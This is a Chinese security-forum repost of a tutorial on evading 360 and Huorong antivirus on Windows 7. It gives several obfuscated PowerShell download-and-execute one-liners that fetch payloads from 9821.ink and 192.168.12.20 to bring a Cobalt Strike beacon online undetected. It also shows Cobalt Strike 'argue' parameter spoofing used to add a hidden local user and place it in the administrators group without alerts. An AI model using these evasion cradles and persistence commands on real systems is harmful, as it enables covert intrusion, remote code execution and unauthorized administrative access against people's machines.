安全矩阵

 找回密码
 立即注册
搜索
查看: 2519|回复: 0

powershell上对抗360与火绒的技巧

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-7-9 09:33:47 | 显示全部楼层 |阅读模式
原文链接:powershell上对抗360与火绒的技巧

0x01 前言
免杀上线一直是经久不衰的话题,今天介绍利用powershell上线来绕过360与火绒的防护,并介绍绕过添加用户的拦截的方式,我们的实验环境是一台装了360全家桶与火绒的win7。
0x02 powershell免杀绕过360与火绒上线
powershell免杀绕过思路参考:
安全客原始payload
Invoke-Expression (New-Object Net.WebClient).DownloadString('http:9821.ink/xxx')
将http分开+号连接
Invoke-Expression(New-Object Net.WebClient).DownloadString("ht"+"tp://9821.ink/xxx")
变量代替
IEX$wc=New-Object Net.WebClient;$wc.DownloadString('h'+'ttp://9821.ink/xxx')
转义符号加在其他字符前不影响字符的意思,避免在0,a,b,f,n,r,t,v的小写字母前出现即可。
Invoke-Expression (New-Object Net.WebClient)."Down`loadString"('h'+'ttp://9821.ink/xxx')
同样可以使用在Net.Webclient上
Invoke-Expression(New-Object "`Ne`T.`Web`Cli`ent")."Down`l`oadString"('h'+'ttp://9821.ink/xxx')

freebuf
powershell -NoExit"$c1='IEX(New-Object Net.WebClient).Downlo';$c2='123(''http://9821.ink/xxx'')'.Replace('123','adString');IEX ($c1+$c2)
powershell "$a1='IEX ((new-object net.webclient).downl';$a2='oadstring(''http://9821.ink/xxx''))';$a3="$a1,$a2";IEX(-join $a3)"
chabug #别名
powershell set-alias -name kaspersky -value Invoke-Expression;kaspersky(New-Object Net.WebClient).DownloadString('http://9821.ink/xxx')
综合起来就成了最开始的上线命令:
powershell set-alias -name kaspersky -value Invoke-Expression;"$a1='kaspersky ((new-object net.webclient).downl';$a2='oadstring(''http://9821.ink/xxx''))';$a3=$a1,$a2;kaspersky(-join $a3)"
那么看了一些powershell的绕过上线cs思路,我们来执行修改命令达到上线,首先还是最原始的生成常见的方式来上线cs:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.12.20:80/a'))"



我们可以看到,此时火绒发现了系统调用了powershell,立刻进行了拦截,那么我们就要修改powershell上线的命令,进行绕过达到上线。
原命令:
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.12.20:80/a'))"
我们可以利用powershell的特性,利用别名、分割、替换变量等多个方式来绕过检测。
修改后的命令:
powershell  -c "IEX(New-Object Net.WebClient)."DownloadString"('ht‘+’tp://192.168.12.20:80/a')"
可以看到修改后的命令,对执行的命令进行替换,并将http分开+号连接的思路,便可以达到免杀上线效果。
此时去目标机器执行:

360与火绒均无报警,CS已经上线,成功绕过杀软达到上线目的。

0x03 绕过杀软添加用户
在内网渗透过程中,有些时候需要往目标机器添加用户,来进行所需操作,但是添加用户杀软非常敏感,都会进行拦截。
为了突出文章目的,我们直接使用cs自带的提权EXP来达到system权限。

我们直接在cs进行用户添加。可以看到遭到了360的拦截:
beacon> shell net user tubai e2e2@wqw /add


此时的思路可以使用cs中argue参数绕过杀软添加用户,#参数污染:
net1 argue net1 xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx

#查看污染的参数 argue

#用污染的net1执行敏感操作
execute net1 user tubai ddsd@123 /add

此时shell net user发现,tubai用户已经添加进去,且360与火绒均未拦截。

我们再将tubai用户加入到administrator组
beacon> execute net1 localgroup administrators tubai /add

此时我们shell net user tubai  ,发现已经成功加入administrators组中

至此便绕过了360与火绒对添加用户的拦截。
0x04 总结
powershell的绕过方式除了命令混淆还有很多,免杀的目的就是围绕你的目标机器进行实施的,并非要追求免杀率,过VT,只要过了你的目标机就好。还有,如无特殊需要,渗透过程中还是不添加用户为妙,毕竟日志都有记录,动静也不小。
参考:
http://www.0x3.biz/archives/837.html
https://xz.aliyun.com/t/7903#toc-0


回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-29 08:48 , Processed in 0.013162 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表